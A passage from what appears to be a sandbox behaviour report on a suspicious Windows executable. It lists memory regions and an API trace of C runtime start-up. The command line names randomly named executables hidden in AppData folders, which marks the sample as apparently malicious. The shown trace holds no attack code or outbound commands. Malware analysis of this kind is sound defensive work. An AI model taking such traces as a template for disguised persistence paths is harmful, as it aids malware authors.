0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 1311 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 1312 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 1313 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 1314 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 1324 start_va = 0x300000 end_va = 0x3c7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000300000" filename = "" Region: id = 1325 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 1326 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 1327 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1328 start_va = 0x140000 end_va = 0x140fff entry_point = 0x0 region_type = private name = "private_0x0000000000140000" filename = "" Region: id = 1329 start_va = 0x490000 end_va = 0x590fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000490000" filename = "" Region: id = 1330 start_va = 0x5a0000 end_va = 0x119ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005a0000" filename = "" Region: id = 1331 start_va = 0x11a0000 end_va = 0x138ffff entry_point = 0x0 region_type = private name = "private_0x00000000011a0000" filename = "" Region: id = 1457 start_va = 0x741e0000 end_va = 0x7421ffff entry_point = 0x741e0000 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 1458 start_va = 0x11a0000 end_va = 0x124ffff entry_point = 0x0 region_type = private name = "private_0x00000000011a0000" filename = "" Region: id = 1459 start_va = 0x1380000 end_va = 0x138ffff entry_point = 0x0 region_type = private name = "private_0x0000000001380000" filename = "" Region: id = 1486 start_va = 0x1250000 end_va = 0x132efff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001250000" filename = "" Region: id = 1487 start_va = 0x73eb0000 end_va = 0x73ec2fff entry_point = 0x73eb0000 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\System32\\dwmapi.dll" (normalized: "c:\\windows\\system32\\dwmapi.dll") Region: id = 1488 start_va = 0x150000 end_va = 0x152fff entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 1489 start_va = 0x150000 end_va = 0x150fff entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Thread: id = 25 os_tid = 0xba8 [0097.421] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x12ff7c | out: lpSystemTimeAsFileTime=0x12ff7c*(dwLowDateTime=0x78133b60, dwHighDateTime=0x1d440a9)) [0097.421] GetCurrentProcessId () returned 0xba4 [0097.421] GetCurrentThreadId () returned 0xba8 [0097.421] GetTickCount () returned 0x23429 [0097.421] QueryPerformanceCounter (in: lpPerformanceCount=0x12ff74 | out: lpPerformanceCount=0x12ff74*=15421059421) returned 1 [0097.422] GetStartupInfoW (in: lpStartupInfo=0x12ff20 | out: lpStartupInfo=0x12ff20*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="\"C:\\Users\\EEBsYm5\\AppData\\Roaming\\MICROS~1\\LSfkRHur.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\XEY8d7zI.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Local\\Microsoft\\Sypykbck.exe\" 1", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x12ff84, hStdError=0x405b06)) [0097.422] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0097.423] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0097.423] GetProcAddress (hModule=0x76910000, lpProcName="FlsAlloc") returned 0x7696418d [0097.423] GetProcAddress (hModule=0x76910000, lpProcName="FlsGetValue") returned 0x76961e16 [0097.423] GetProcAddress (hModule=0x76910000, lpProcName="FlsSetValue") returned 0x769676e6 [0097.423] GetProcAddress (hModule=0x76910000, lpProcName="FlsFree") returned 0x76961f61 [0097.424] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0097.425] GetCurrentThreadId () returned 0xba8 [0097.425] GetStartupInfoW (in: lpStartupInfo=0x12febc | out: lpStartupInfo=0x12febc*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="\"C:\\Users\\EEBsYm5\\AppData\\Roaming\\MICROS~1\\LSfkRHur.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\XEY8d7zI.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Local\\Microsoft\\Sypykbck.exe\" 1", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x405699, hStdOutput=0x405a4c, hStdError=0x13807d0)) [0097.425] GetStdHandle (nStdHandle=0xfffffff6) returned 0x3 [0097.425] GetFileType (hFile=0x3) returned 0x0 [0097.425] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0097.425] GetFileType (hFile=0x7) returned 0x0 [0097.425] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0097.425] GetFileType (hFile=0xb) returned 0x0 [0097.425] SetHandleCount (uNumber=0x20) returned 0x20 [0097.425] GetCommandLineA () returned="\"C:\\Users\\EEBsYm5\\AppData\\Roaming\\MICROS~1\\LSfkRHur.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\XEY8d7zI.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Local\\Microsoft\\Sypykbck.exe\" 1" [0097.425] GetEnvironmentStringsW () returned 0x16fd70* [0097.425] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=C:=C:\\Users\\EEBsYm5\\Desktop", cchWideChar=1033, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1033 [0097.425] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=C:=C:\\Users\\EEBsYm5\\Desktop", cchWideChar=1033, lpMultiByteStr=0x13811f8, cbMultiByte=1033, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="=C:=C:\\Users\\EEBsYm5\\Desktop", lpUsedDefaultChar=0x0) returned 1033 [0097.426] FreeEnvironmentStringsW (penv=0x16fd70) returned 1 [0097.426] GetLastError () returned 0x6 [0097.426] SetLastError (dwErrCode=0x6) [0097.426] GetLastError () returned 0x6 [0097.426] SetLastError (dwErrCode=0x6) [0097.426] GetLastError () returned 0x6 [0097.426] SetLastError (dwErrCode=0x6) [0097.426] GetACP () returned 0x4e4 [0097.426] GetLastError () returned 0x6 [0097.426] SetLastError (dwErrCode=0x6) [0097.426] IsValidCodePage (CodePage=0x4e4) returned 1 [0097.426] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x12fe84 | out: lpCPInfo=0x12fe84) returned 1 [0097.426] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x12f950 | out: lpCPInfo=0x12f950) returned 1 [0097.426] GetLastError () returned 0x6 [0097.426] SetLastError (dwErrCode=0x6) [0097.426] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x12fd64, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0097.427] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x12fd64, cbMultiByte=256, lpWideCharStr=0x12f6c8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0097.427] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpCharType=0x12f964 | out: lpCharType=0x12f964) returned 1 [0097.427] GetLastError () returned 0x6 [0097.427] SetLastError (dwErrCode=0x6) [0097.427] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x12fd64, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0097.427] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x12fd64, cbMultiByte=256, lpWideCharStr=0x12f698, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿਘശAĀ") returned 256 [0097.427] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿਘശAĀ", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0097.427] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿਘശAĀ", cchSrc=256, lpDestStr=0x12f488, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿЀ") returned 256 [0097.427] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿЀ", cchWideChar=256, lpMultiByteStr=0x12fc64, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\xff\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xd7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\x5a\xe8\xeb\xef\x9c\xfe\x12", lpUsedDefaultChar=0x0) returned 256 [0097.427] GetLastError () returned 0x6 [0097.427] SetLastError (dwErrCode=0x6) [0097.427] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x12fd64, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0097.427] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x12fd64, cbMultiByte=256, lpWideCharStr=0x12f6b8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿਘശAĀ") returned 256 [0097.427] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿਘശAĀ", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0097.427] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿਘശAĀ", cchSrc=256, lpDestStr=0x12f4a8, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸЀ") returned 256 [0097.428] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸЀ", cchWideChar=256, lpMultiByteStr=0x12fb64, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xf7\xd8\xd9\xda\xdb\xdc\xdd\xde\x9f\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\xff\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xd7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc